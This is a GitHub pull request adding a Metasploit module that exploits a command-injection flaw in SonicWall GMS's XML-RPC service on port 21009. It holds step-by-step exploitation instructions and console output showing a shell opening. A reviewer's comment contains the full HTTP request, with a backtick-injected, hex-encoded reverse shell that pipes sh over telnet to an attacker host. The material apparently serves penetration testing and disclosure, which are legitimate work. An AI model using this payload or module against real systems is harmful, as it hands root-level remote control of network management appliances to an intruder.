New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add SonicWall XML-RPC Remote Code Execution Exploit Module #10305

Merged
merged 2 commits into from Jul 30, 2018

Conversation

Projects
None yet
5 participants
@Flandini
Copy link
Contributor

Flandini commented Jul 13, 2018

Re-submission of pull request #10259 from a unique branch of my repo.

sonicwall_xmlrpc_rce is a remote exploit against SonicWall Global Management
System Virtual Appliance and is written by Michael Flanders of Trend
Micro Zero Day Initiative with assistance by @kernelsmith of Trend Micro Zero
Day Initiative. It is considered a reliable exploit, and allows you to remotely
execute commands as root.

Vulnerable Application

  • This exploit works against a vulnerable SonicWall Global Management System
    Virtual Appliance (A.K.A. Sonicwall GMSVP) of versions 8.1 (Build 8110.1197) and
    earlier. The virtual appliance can be downloaded here:

  • This module exploits the virtual appliance's lack of checking on user-supplied
    parameters to XML-RPC calls to a vulnerable Java service running on port 21009.
    A call to a shell script is made using this user-supplied parameter contained in
    backticks allowing command substitution and remote code execution.

  • To reliably determine whether the target virtual appliance is vulnerable,
    you will have to examine the web console's login page. This is also automatically
    done in the check function of the exploit.

Verification Steps

  • Start msfconsole
  • use exploit/unix/sonicwall/sonicwall_xmlrpc_rce
  • set RHOST to the IP address of the vulnerable virtual appliance
  • set RPORT to 21009
  • set payload to the desired payload
  • set any additional options for the payload e.g. LHOST/LPORT
  • exploit
  • Verify that you get a shell
  • Verify that you do not crash

Options

set SSL [true/false]
  • Set this true/false depending on whether the instance of SonicWall GMSVP has
    been configured to use SSL.
set WEB_SERVER_PORT [port]
  • This is the port of the login page for the web server/virtual appliance. For
    SonicWall GMVSP this is typically http://[ip]:80; therefore, this option is set
    by default to 80 (or 443 if set SSL true).

Scenarios

  • This is example output from a normal usage/scenario. This console output is for
    SonicWall GMSVP version 8.0 (Build 8046.1396):
msf > use exploit/unix/sonicwall/sonicwall_xmlrpc_rce
msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > show options

Module options (exploit/unix/sonicwall/sonicwall_xmlrpc_rce):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                             yes       The target address
   RPORT            80               yes       The target port (TCP)
   SSL              false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                             no        HTTP server virtual host
   WEB_SERVER_PORT                   no        Port of web console login page.
                                             Defaults to 80/443 depending on SSL.


Exploit target:

   Id  Name
   --  ----
   0   SonicWall Global Management System Virtual Appliance


msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > set RPORT 21009
RPORT => 21009

msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > set RHOST 192.168.152.173
RHOST => 192.168.152.173

msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > set payload cmd/unix/reverse
payload => cmd/unix/reverse

msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > set LHOST 192.168.152.193
LHOST => 192.168.152.193

msf exploit(unix/sonicwall/sonicwall_xmlrpc_rce) > exploit

[*] Started reverse TCP double handler on 192.168.152.193:4444
[*] The target appears to be vulnerable, continuing exploit...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo H7sn3KYXeuCZy27Q;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "H7sn3KYXeuCZy27Q\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.152.193:4444 -> 192.168.152.173:44698) at 2018-07-05 12:30:56 -0400
@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Jul 24, 2018

Is it possible to provide a pcap?

@Flandini

This comment has been minimized.

Copy link
Contributor

Flandini commented Jul 24, 2018

Here is a pcap:

sonicwall_xmlrpc_pcap.zip

@wchen-r7

This comment has been minimized.

Copy link
Contributor

wchen-r7 commented Jul 26, 2018

Thank you

@wvu-r7 wvu-r7 self-assigned this Jul 26, 2018

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Jul 30, 2018

check:

GET / HTTP/1.1
Host: 192.168.152.173
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"496-1433100344000"
Last-Modified: Sun, 31 May 2015 19:25:44 GMT
Content-Type: text/html
Content-Length: 496
Date: Mon, 09 Jul 2018 12:37:35 GMT

<HTML>
<HEAD>
<META http-equiv="refresh" content="1;URL=/appliance/login">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
<META HTTP-EQUIV="Expires" CONTENT="0">
<TITLE>Dell SonicWALL Universal Management Suite v8.0 </TITLE>
</HEAD>

<BODY BGCOLOR="#FFFFFF">
<CENTER>
<P><B>Dell SonicWALL Universal Management Suite v8.0</B>
</CENTER>
</BODY>

<HEAD>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
</HEAD>

</HTML>

exploit:

POST / HTTP/1.1
Host: 192.168.152.173:21009
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Content-Type: text/xml; charset=UTF-8
Content-Length: 910

<?xml version="1.0" encoding="UTF-8"?>
<methodCall>
  <methodName>set_time_config</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>timezone</name>
            <value>
              <string>"`/bin/echo -ne '\x73\x68\x20\x2d\x63\x20\x27\x28\x73\x6c\x65\x65\x70\x20\x34\x35\x39\x38\x7c\x74\x65\x6c\x6e\x65\x74\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x32\x2e\x31\x39\x33\x20\x34\x34\x34\x34\x7c\x77\x68\x69\x6c\x65\x20\x3a\x20\x3b\x20\x64\x6f\x20\x73\x68\x20\x26\x26\x20\x62\x72\x65\x61\x6b\x3b\x20\x64\x6f\x6e\x65\x20\x32\x3e\x26\x31\x7c\x74\x65\x6c\x6e\x65\x74\x20\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x32\x2e\x31\x39\x33\x20\x34\x34\x34\x34\x20\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c\x6c\x20\x32\x3e\x26\x31\x20\x26\x29\x27'|sh`"</string>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>
HTTP/1.1 200 OK
Server: Apache XML-RPC 1.0
Connection: close
Content-Type: text/xml
Content-Length: 254

<?xml version="1.0" encoding="UTF-8"?><methodResponse xmlns:ex="http://ws.apache.org/xmlrpc/namespaces/extensions"><params><param><value><struct><member><name>result</name><value>success</value></member></struct></value></param></params></methodResponse>

Nicely done! I would have asked about encoding with XML entities, but it looks like you've noted & as a badchar. 👍

@wvu-r7 wvu-r7 merged commit 7d8a95d into rapid7:master Jul 30, 2018

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

wvu-r7 added a commit that referenced this pull request Jul 30, 2018

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Jul 30, 2018

msjenkins-r7 added a commit that referenced this pull request Jul 30, 2018

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Jul 30, 2018

Release Notes

The exploit/unix/sonicwall/sonicwall_xmlrpc_rce module has been added to the framework. It targets SonicWall Global Management System's XML-RPC service.

@tdoan-r7 tdoan-r7 added the rn-exploit label Aug 15, 2018

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment